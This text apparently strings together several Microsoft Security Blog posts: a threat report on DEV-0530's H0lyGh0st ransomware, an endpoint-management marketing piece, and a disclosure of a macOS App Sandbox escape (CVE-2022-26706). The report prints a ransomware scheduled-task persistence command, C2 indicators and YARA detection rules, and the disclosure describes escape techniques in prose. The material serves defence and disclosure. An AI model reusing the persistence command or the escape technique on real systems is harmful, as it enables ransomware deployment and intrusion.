| main_main main_init_0 main_IsAdmin main_encryptFiles HolyLocker_RsaAlgorithm_GenerateKeyPair HolyLocker_RsaAlgorithm_Encrypt HolyLocker_CryptoAlogrithm___ptr_File__EncryptRSA HolyLocker_CryptoAlogrithm___ptr_File__EncryptAES HolyLocker_utilities_GenerateRandomANString HolyLocker_utilities_StringInSlice HolyLocker_utilities_SliceContainsSubstring HolyLocker_utilities_RenameFile HolyLocker_Main_init HolyLocker_communication_New HolyLocker_communication___ptr_Client__GetPubkeyFromServer HolyLocker_communication___ptr_Client__Do HolyLocker_communication___ptr_Client__SendEncryptedPayload HolyLocker_communication___ptr_Client__SendFinishRequest HolyLocker_communication___ptr_Client__AddNewKeyPairToIntranet HolyLocker_communication___ptr_Client__AddNewKeyPair |
main_main main_init_0 main_IsAdmin main_encryptFiles main_DeleteSchTask main_DisableNetworkDevice main_encryptString main_decryptString main_cryptAVPass main_SelfDelete HolyLocker_RsaAlgorithm_GenerateKeyPair HolyLocker_RsaAlgorithm_Encrypt HolyLocker_CryptoAlogrithm___ptr_File__EncryptRSA HolyLocker_CryptoAlogrithm___ptr_File__EncryptAES HolyLocker_utilities_GenerateRandomANString HolyLocker_utilities_StringInSlice HolyLocker_utilities_SliceContainsSubstring HolyLocker_utilities_RenameFile HolyLocker_Main_init HolyLocker_communication_New HolyLocker_communication___ptr_Client__GetPubkeyFromServer HolyLocker_communication___ptr_Client__Do HolyLocker_communication___ptr_Client__SendEncryptedPayload HolyLocker_communication___ptr_Client__SendFinishRequest HolyLocker_communication___ptr_Client__AddNewKeyPairToIntranet HolyLocker_communication___ptr_Client__AddNewKeyPair |
MSTIC assesses DEV-0530 successfully compromised several targets in multiple countries using HolyRS.exe in November 2021. A review of the victims showed they were primarily small-to-midsized businesses, including manufacturing organizations, banks, schools, and event and meeting planning companies. The victimology indicates that these victims are most likely targets of opportunity. MSTIC suspects that DEV-0530 might have exploited vulnerabilities such as CVE-2022-26352 (DotCMS remote code execution vulnerability) on public-facing web applications and content management systems to gain initial access into target networks. The SiennaBlue malware variants were then dropped and executed. To date, MSTIC has not observed DEV-0530 using any 0-day exploits in their attacks.
After successfully compromising a network, DEV-0530 exfiltrated a full copy of the victims’ files. Next, the attackers encrypted the contents of the victim device, replacing all file names with Base64-encoded versions of the file names and renaming the extension to .h0lyenc. Victims found a ransom note in C:\FOR_DECRYPT.html, as well as an email from the attackers with subject lines such as:
!!!!We are < H0lyGh0st>. Please Read me!!!!
As seen in the screenshot below, the email from the attackers let the victim know that the group has stolen and encrypted all their files. The email also included a link to a sample of the stolen data to prove their claim, in addition to the demand for payment for recovering the files.
BTLC.exe is the latest DEV-0530 ransomware variant and has been seen in the wild since April 2022. BTLC.exe can be configured to connect to a network share using the default username, password, and intranet URL hardcoded in the malware if the ServerBaseURL is not accessible from the device. One notable feature added to BTLC.exe is a persistence mechanism in which the malware creates or deletes a scheduled task called lockertask, such that the following command line syntax can be used to launch the ransomware:
cmd.exe /Q /c schtasks /create /tn lockertask /tr [File] /sc minute /mo 1 /F /ru system 1> \\127.0.0.1\ADMIN$\__[randomnumber] 2>&1
Once the ransomware is successfully launched as an administrator, it tries to connect to the default ServerBaseURL hardcoded in the malware, attempts to upload a public key to the C2 server, and encrypts all files in the victim’s drive.
| HolyRS.exe/HolyLocker.exe C2 configuration | BTLC.exe C2 configuration |
|---|---|
| main_ServerBaseURL: hxxp://193[.]56[.]29[.]123:8888 main_IntranetURL: 10[.]10[.]3[.]42 main_Username: adm-karsair |
EncryptionKey: H0lyGh0stKey1234 IntranetUrl: 192[.]168[.]168[.]5 Username: atrismsp Scheduledtask name: lockertask |
Based on our investigation, the attackers frequently asked victims for anywhere from 1.2 to 5 Bitcoins. However, the attackers were usually willing to negotiate and, in some cases, lowered the price to less than one-third of the initial asking price. As of early July 2022, a review of the attackers’ wallet transactions shows that they have not successfully extorted ransom payments from their victims.
HolyRS.exe/BTLC.exe C2 URL pattern:
Examples of HolyRS.exe/BTLC.exe ransom note metadata:
Attacker email address: H0lyGh0st@mail2tor[.]com
Image location: hxxps://cloud-ex42[.]usaupload[.]com/cache/plugins/filepreviewer/219002/f44c6929994386ac2ae18b93f8270ec9ff8420d528c9e35a878efaa2d38fb94c/1100x800_cropped.jpg
Report URL: hxxp://matmq3z3hiovia3voe2tix2x54sghc3tszj74xgdy4tqtypoycszqzqd[.]onion
Microsoft will continue to monitor DEV-0530 activity and implement protections for our customers. The current detections, advanced detections, and indicators of compromise (IOCs) in place across our security products are detailed below.
Microsoft has implemented protections to detect these malware families as SiennaPurple and SiennaBlue (e.g., ALF:Ransom:Win32/SiennaBlue.A) via Microsoft Defender Antivirus and Microsoft Defender for Endpoint, wherever these are deployed on-premises and in cloud environments.
Microsoft encourages all organizations to proactively implement and frequently validate a data backup and restore plan as part of broader protection against ransomware and extortion threats.
The techniques used by DEV-0530 in H0lyGh0st activity can be mitigated by adopting the security considerations provided below:
Our blog on the ransomware-as-a-service economy has an exhaustive guide on how to protecting against ransomware threats. We encourage readers to refer to that blog for a comprehensive guide that has a deep dive into each of the following areas:
For small or midsize companies who use Microsoft Defender for Business or Microsoft 365 Business Premium, enabling each of the features below will provide a protective layer against these threats where applicable. For Microsoft 365 Defender customers, the following checklist eliminates security blind spots:
This list provides IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.
| Indicator | Type | Description |
|---|---|---|
| 99fc54786a72f32fd44c7391c2171ca31e72ca52725c68e2dde94d04c286fccd | SHA-256 | Hash of BTLC_C.exe |
| f8fc2445a9814ca8cf48a979bff7f182d6538f4d1ff438cf259268e8b4b76f86 | SHA-256 | Hash of HolyRS.exe |
| bea866b327a2dc2aa104b7ad7307008919c06620771ec3715a059e675d9f40af | SHA-256 | Hash of BTLC.exe |
| cmd.exe /Q /c schtasks /create /tn lockertask /tr [File] /sc minute /mo 1 /F /ru system 1> \\127.0.0.1\ADMIN$\__[randomnumber] 2>&1 | Command line | Example of new ScheduledTask to BTLC.exe |
| 193[.]56[.]29[.]123 | C2 | C2 IP address |
| H0lyGh0st@mail2tor[.]com | Ransomware payment communication address | |
| C:\FOR_DECRYPT.html | File path | File path of ransom note |
NOTE: These indicators should not be considered exhaustive for this observed activity.
Microsoft Defender for Endpoint customers may see any or a combination of the following alerts as an indication of possible attack.
To locate possible DEV-0530 activity mentioned in this blog post, Microsoft Sentinel customers can use the queries detailed below:
Identify DEV-0530 IOCs
This query identifies a match based on IOCs related to DEV-0530 across various Sentinel data feeds:
Identify renamed file extension
DEV-0530 actors are known to encrypt the contents of the victim’s device as well as rename the file and extension. The following query detects the creation of files with .h0lyenc extension:
Identify Microsoft Defender Antivirus detection related to DEV-0530
This query looks for Microsoft Defender AV detections related to DEV-0530 and joins the alert with other data sources to surface additional information such as device, IP, signed-in on users, etc.
https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityAlert/Dev-0530AVHits.yaml
rule SiennaPurple
{
meta:
author = "Microsoft Threat Intelligence Center (MSTIC)"
description = "Detects PDB path, C2, and ransom note in DEV-0530 Ransomware SiennaPurple samples"
hash = "99fc54786a72f32fd44c7391c2171ca31e72ca52725c68e2dde94d04c286fccd"
strings:
$s1 = "ForOP\\attack(utils)\\attack tools\\Backdoor\\powershell\\btlc_C\\Release\\btlc_C.pdb"
$s2 = "matmq3z3hiovia3voe2tix2x54sghc3tszj74xgdy4tqtypoycszqzqd.onion"
$s3 = "H0lyGh0st@mail2tor.com"
$s4 = "We are <HolyGhost>. All your important files are stored and encrypted."
$s5 = "aic^ef^bi^abc0"
$s6 = "---------------------------3819074751749789153841466081"
condition:
uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and
filesize < 7MB and filesize > 1MB and
all of ($s*)
}
rule SiennaBlue
{
meta:
author = "Microsoft Threat Intelligence Center (MSTIC)"
description = "Detects Golang package, function, and source file names observed in DEV-0530 Ransomware SiennaBlue samples"
hash1 = "f8fc2445a9814ca8cf48a979bff7f182d6538f4d1ff438cf259268e8b4b76f86"
hash2 = "541825cb652606c2ea12fd25a842a8b3456d025841c3a7f563655ef77bb67219
strings:
$holylocker_s1 = "C:/Users/user/Downloads/development/src/HolyLocker/Main/HolyLock/locker.go"
$holylocker_s2 = "HolyLocker/Main.EncryptionExtension"
$holylocker_s3 = "HolyLocker/Main.ContactEmail"
$holylocker_s4 = "HolyLocker/communication.(*Client).GetPubkeyFromServer"
$holylocker_s5 = "HolyLocker/communication.(*Client).AddNewKeyPairToIntranet"
$holyrs_s1 = "C:/Users/user/Downloads/development/src/HolyGhostProject/MainFunc/HolyRS/HolyRS.go"
$holyrs_s2 = "HolyGhostProject/MainFunc.ContactEmail"
$holyrs_s3 = "HolyGhostProject/MainFunc.EncryptionExtension"
$holyrs_s4 = "HolyGhostProject/Network.(*Client).GetPubkeyFromServer"
$holyrs_s5 = "HolyGhostProject/Network.(*Client).AddNewKeyPairToIntranet"
$s1 = "Our site : <b><a href=%s>H0lyGh0stWebsite"
$s2 = ".h0lyenc"
$go_prefix = "Go build ID:"
condition:
uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and
filesize < 7MB and filesize > 1MB and
$go_prefix and all of ($s*) and (all of ($holylocker_*) or all of ($holygrs_*))
}
The post North Korean threat actor targets small and midsize businesses with H0lyGh0st ransomware appeared first on Microsoft Security Blog.
Competition for talent has increased pressure to lead in the digital space, and business decisions now weigh user experience for employees heavily among costs and benefits. Workers insist on experiences that mirror their personal experiences, often on their own devices. As enterprise computing has expanded beyond the cubicle, the need to manage the ensuing explosion of complexity, especially when it comes to device security, has raised the bar for technology and information business decision-makers.
Microsoft has heard consistently that meeting these expanding needs with limited resources is job one. As new solutions seem to emerge as rapidly as the problem itself expands, providing a consistent, proven, centralized portal for endpoint management is how Microsoft aims to be the partner of choice in this space.
The scale of Microsoft—and our investments in endpoint management and endpoint security—affords our customers peace of mind that our solutions will continue to evolve alongside the demands and threats they face. We deliver advanced end-to-end cross-cloud, cross-platform security solutions, which integrate more than 50 different categories across security, compliance, identity, device management, and privacy, informed by more than 24 trillion threat signals we see each day. Proof of customers’ trust and peace of mind: the Microsoft Security business grew more than 45 percent year-over-year, totaling USD15 billion of annual revenue.1
This scale also allows Microsoft to bring a unified endpoint management solution that is tailored for customers’ challenges, especially the transformation to cloud management. Microsoft is recognized as a Leader in the Unified Endpoint Management Software 2022 Vendor Assessment IDC MarketScape report, including Ruggedized/Internet of Things Device Deployments and Small and Midsize Businesses. Microsoft Endpoint Manager is an integrated solution that simplifies management across multiple operating systems, cloud, on-premises, mobile, desktop, and virtualized endpoints.
This quote from the report may be of special interest to customers trying to do more with less:
“Integration is a key aspect of the Microsoft Endpoint Manager offering, and the product ties into a wide range of other tools from the vendor, including Office 365 apps, Teams, and OneDrive as well as Microsoft security products including Microsoft Defender for Endpoint (endpoint security) and Microsoft Sentinel (security information and event management).”
In short, IT administrators get more done in one place, with simplified management of multiple operating systems, cloud, on-premises, mobile, desktop, and virtualized endpoints. The IDC MarketScape report calls out the topic of enterprise management for macOS endpoints:
“[Microsoft Endpoint Manager] includes the ability to apply granular policies to Mac software distribution and deployments, broader support for macOS device configuration profiles, and user-based policy enforcement customization.”
In 2022, we will further expand across platforms by releasing enhanced support for devices running Android Open Source Project (AOSP), such as Oculus virtual reality (VR) headsets, as well as enable conditional access policies and device settings for Linux desktops. This way, IT can protect data on any devices by securing user apps; configuring, securing, monitoring, and updating apps remotely; and reducing risks with the combination of identity-based management and Microsoft Security.
We hear from customers that powerful software is great, but a frictionless experience is better. We try to bring this learning into our product development and continue working to improve not just what control IT admins have over endpoints, but also how they interact with them. How can data be turned into insights? How does portfolio visibility contribute to security?
We understand, too, that users are vested stakeholders in the process, and their satisfaction often determines whether IT can notch up a win or not. Access policies that are too strict can frustrate users or lead to insecure workarounds and require a balance of security and usability. We know that the line between home and work is blurred—so too is the line between business and personal devices—we try to improve on the ways we can help users do their work where and how they want.
IDC MarketScape report also recognizes our focus on endpoint analytics that are designed to make suggestions instead of presenting data, and flag anomalies in the continuous stream of health, compliance, and security signals. When an IT admin can take proactive steps instead of making reactive fixes, we notch up a win for everyone.
The improved experience is well described by Grupo Bancolombia, who adopted Endpoint Manager for more flexibility to support employees in the cloud so they can work from anywhere in a secure way. Read the case study to learn more.
This quote from Santiago Santacruz Pareja, Grupo Bancolombia IT Infrastructure Engineer, encapsulates the improved experience for users and IT pros:
“We quickly rolled out BitLocker to 23,000 machines, but the best part was that it was invisible to employees—they didn’t notice any changes to their device or daily work, and we succeeded in protecting their data.”
You’re invited to read the full report or view a snapshot of the IDC MarketScape report below. Keep up with ongoing developments on Unified Endpoint Management (UEM) by visiting the Microsoft Endpoint Manager Tech Community blog and exploring Microsoft Endpoint Manager.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
We thank our customers and partners for being on this journey with us.
IDC MarketScape: Worldwide Unified Endpoint Management Software 2022 Vendor Assessment, Doc #US48325122, May 2022.
1Microsoft Fiscal Year 2022 Second Quarter Earnings Conference Call, Microsoft. January 25, 2022.
The post Microsoft recognized as a Leader in UEM Software 2022 IDC MarketScape reports appeared first on Microsoft Security Blog.
Microsoft uncovered a vulnerability in macOS that could allow specially crafted codes to escape the App Sandbox and run unrestricted on the system. We shared these findings with Apple through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR) in October 2021. A fix for this vulnerability, now identified as CVE-2022-26706, was included in the security updates released by Apple on May 16, 2022. Microsoft shares the vulnerability disclosure credit with another researcher, Arsenii Kostromin (0x3c3e), who discovered a similar technique independently.
We encourage macOS users to install these security updates as soon as possible. We also want to thank the Apple product security team for their responsiveness in fixing this issue.
The App Sandbox is Apple’s access control technology that application developers must adopt to distribute their apps through the Mac App Store. Essentially, an app’s processes are enforced with customizable rules, such as the ability to read or write specific files. The App Sandbox also restricts the processes’ access to system resources and user data to minimize the impact or damage if the app becomes compromised. However, we found that specially crafted codes could bypass these rules. An attacker could take advantage of this sandbox escape vulnerability to gain elevated privileges on the affected device or execute malicious commands like installing additional payloads.
We found the vulnerability while researching potential ways to run and detect malicious macros in Microsoft Office on macOS. For backward compatibility, Microsoft Word can read or write files with an “~$” prefix. Our findings revealed that it was possible to escape the sandbox by leveraging macOS’s Launch Services to run an open –stdin command on a specially crafted Python file with the said prefix.
Our research shows that even the built-in, baseline security features in macOS could still be bypassed, potentially compromising system and user data. Therefore, collaboration between vulnerability researchers, software vendors, and the larger security community remains crucial to helping secure the overall user experience. This includes responsibly disclosing vulnerabilities to vendors.
In addition, insights from this case study not only enhance our protection technologies, such as Microsoft Defender for Endpoint, but they also help strengthen the security strategies of software vendors and the computing landscape at large. This blog post thus provides details of our research and overviews of similar sandbox escape vulnerabilities reported by other security researchers that helped enrich our analysis.
In a nutshell, macOS apps can specify sandbox rules for the operating system to enforce on themselves. The App Sandbox restricts system calls to an allowed subset, and the said system calls can be allowed or disallowed based on files, objects, and arguments. Simply put, the sandbox rules are a defense-in-depth mechanism that dictates the kind of operations an application can or can’t do, regardless of the type of user running it. Examples of such operations include:
Therefore, the App Sandbox is a useful tool for all macOS developers in providing baseline security for their applications, especially for those that have large attack surfaces and run user-provided code. One example of these applications is Microsoft Office.
Attackers have targeted Microsoft Office in their attempts to gain a foothold on devices and networks. One of their techniques is abusing Office macros, which they use in social engineering attacks to trick users into downloading malware and other payloads.
On Windows systems, Microsoft Defender Application Guard for Office helps secure Microsoft Office against such macro abuse by isolating the host environment using Hyper-V. With this feature enabled, an attacker must first be equipped with a Hyper-V guest-to-host vulnerability to affect the host system—a very high bar compared to simply running a macro. Without a similar isolation technology and default setting on macOS, Office must rely on the operating system’s existing mitigation strategies. Currently, the most promising technology is the macOS App Sandbox.
Viewing the Microsoft sandbox rules is quite straightforward with the codesign utility. Figure 2 below shows the truncated sandbox rules for Microsoft Word:
One of the rules dictates the kind of files the application is allowed to read or write. As seen in the screenshot of the syntax below, Word is allowed to read or write files with filenames that start with the “~$” prefix. The reason for this rule is rooted in the way Office works internally and remains intact for backward compatibility.
One of the rules dictates the kind of files the application is allowed to read or write. As seen in the screenshot of the syntax below, Word is allowed to read or write files with filenames that start with the “~$” prefix. The reason for this rule is rooted in the way Office works internally and remains intact for backward compatibility.
Despite the security restrictions imposed by the App Sandbox’s rules on applications, it’s possible for attackers to bypass the said rules and let malicious codes “escape” the sandbox and execute arbitrary commands on an affected device. These codes could be hidden in a specially crafted Word macro, which, as mentioned earlier, is one of the attackers’ preferred entry points.
For example, in 2018, MDSec reported a vulnerability in Microsoft Office on macOS that could allow an attacker to bypass the App Sandbox. As explained in their blog post, MDSec’s proof-of-concept (POC) exploit took advantage of the fact that Word could drop files with arbitrary contents to arbitrary directories (even after passing traditional permission checks), as long as these files’ filenames began with a “~$” prefix. This bypass was relatively straightforward: have a specially crafted macro drop a .plist file in the user’s LaunchAgents directory.
The LaunchAgents directory is a well-known persistence mechanism in macOS. PLIST files that adhere to a specific structure describe (that is, contain the metadata of) macOS launch agents initiated by the launchd process when a user signs in. Since these launch agents will be the children of launchd, they won’t inherit the sandbox rules enforced onto Word, and therefore will be out of the Office sandbox.
Shortly after the above vulnerability was reported, Microsoft deployed a fix that denied file writes to the LaunchAgents directory and other folders with similar implications. The said disclosure also prompted us to look into different possible sandbox escapes in Microsoft Word and other applications.
In 2020, several blog posts described a generic sandbox escape vulnerability in macOS’s /usr/bin/open utility, a command commonly used to launch files, folders, and applications just as if a user double-clicked them. While open is a handy command, it doesn’t create child processes on its own. Instead, it performs an inter-process communication (IPC) with the macOS Launch Services, whose logic is implemented in the context of the launchd process. Launch Services then performs the heavy lifting by resolving the handler and launching the right app. Since launchd creates the process, it’s not restricted by the caller’s sandbox, similar to how MDSec’s POC exploit worked in 2018.
However, using open for sandbox escape purposes isn’t trivial because the destination app must be registered within Launch Services. This means that, for example, one couldn’t run files like osascript outside the sandbox using open. Our internal offensive security team therefore decided to reassess the open utility for sandbox escape purposes and use it in a larger end-to-end attack simulation.
Our obvious first attempt in creating a POC exploit was to create a macro that launches a shell script with the Terminal app. Surprisingly, the POC didn’t work because files dropped from within the sandboxed Word app were automatically given the extended attribute com.apple.quarantine (the same one used by Safari to keep track of internet-downloaded files, as well as by Gatekeeper to block malicious files from executing), and Terminal simply refused to run files with that attribute. We also tried using Python scripts, but the Python app had similar issues running files having the said attribute.
Our second attempt was to use application extensibility features. For example, Terminal would run the default macOS shell (zsh), which would then run arbitrary commands from files like ~/.zshenv before running its own command line. This meant that dropping a .zshenv file in the user’s home directory and launching the Terminal app would cause the sandbox escape. However, due to Word’s sandbox rules, dropping a .zshenv file wasn’t straightforward, as the rules only allowed an application to write to files that begin with the “~$” prefix.
However, there is an interesting way of writing such a file indirectly. macOS was shipped with an application called Archive Utility responsible of extracting archive files (such as ZIP files). Such archives were extracted without any user interaction, and the files inside an archive were extracted in the same directory as the archive itself. Therefore, our second POC worked as follows:
In October 2021, Perception Point published a blog post that discussed a similar finding (and more elegant, in our opinion). In the said post, Perception Point released details about their sandbox escape (now identified as CVE-2021-30864), which used the following facts:
Therefore, Perception Point’s POC exploit was cleverly simple:
Apple has since patched the vulnerability Perception Point reported in the latest version of macOS, Monterey. While we could still create the “~$exploit.zip” file in the user’s home directory, using open to launch the Archive Utility on the ZIP file now resulted in it being extracted to the Downloads folder. While this is an interesting behavior, we could no longer use it for sandbox escape purposes.
After discovering that Apple has fixed both variants that abuse .zshenv, , we decided to examine all the command line options of the open command. Soon after, we came across the following:
As mentioned earlier, we couldn’t run Python with a dropped .py file since Python refuses to run files with the “com.apple.quarantine” extended attribute. We also considered abusing the PYTHONSTARTUP environment variable, but Apple’s fix to CVE-2021-30864 apparently prevented that option, too. However, –stdin bypassed the “com.apple.quarantine” extended attribute restriction, as there was no way for Python to know that the contents from its standard input originated from a quarantined file.
Our POC exploit thus became simply as follows:
We also came up with a version that’s short enough to be a Twitter post:
Since our initial discovery of leveraging Launch Services in macOS for generic sandbox escapes, we have been using our POC exploits in Red Team operations to emulate end-to-end attacks against Microsoft Defender for Endpoint, improve its capabilities, and challenge our detections. Shortly after our Red Team used our first POC exploit, our Blue Team members used it to train artificial intelligence (AI) models to detect our exploit not only in Microsoft Office but also on any app used for a similar Launch Services-based sandbox escape.
After we learned of Perception Point’s technique and created our own new exploit technique (the Python POC), our Red Team saw another opportunity to fully test our own detection durability. Indeed, the same set of detection rules that handled our first sandbox escape vulnerability still turned out to be durable—even before the vulnerability related to our second POC exploit was patched.
For Defender for Endpoint customers, such detection durability feeds into the product’s threat and vulnerability management capabilities, which allows them to quickly discover, prioritize, and remediate misconfigurations and vulnerabilities—including those affecting non-Windows devices—through a unified security console.
Jonathan Bar Or
Microsoft 365 Defender Research Team
The post Uncovering a macOS App Sandbox escape vulnerability: A deep dive into CVE-2022-26706 appeared first on Microsoft Security Blog.
The morning of June 9th, I was driving over the Golden Gate Bridge into San Francisco with my family. While crossing the bridge my children shared some facts about this modern engineering marvel. Each day, approx. 100,000 vehicles travel over the bridge deck, which weighs a staggering 150,000 tons, and is suspended by 250 pairs …
All Hands-on Deck: A Whole-of-Society Approach for Cybersecurity Read More »
The morning of June 9th, I was driving over the Golden Gate Bridge into San Francisco with my family. While crossing the bridge my children shared some facts about this modern engineering marvel. Each day, approx. 100,000 vehicles travel over the bridge deck, which weighs a staggering 150,000 tons, and is suspended by 250 pairs of steel ropes.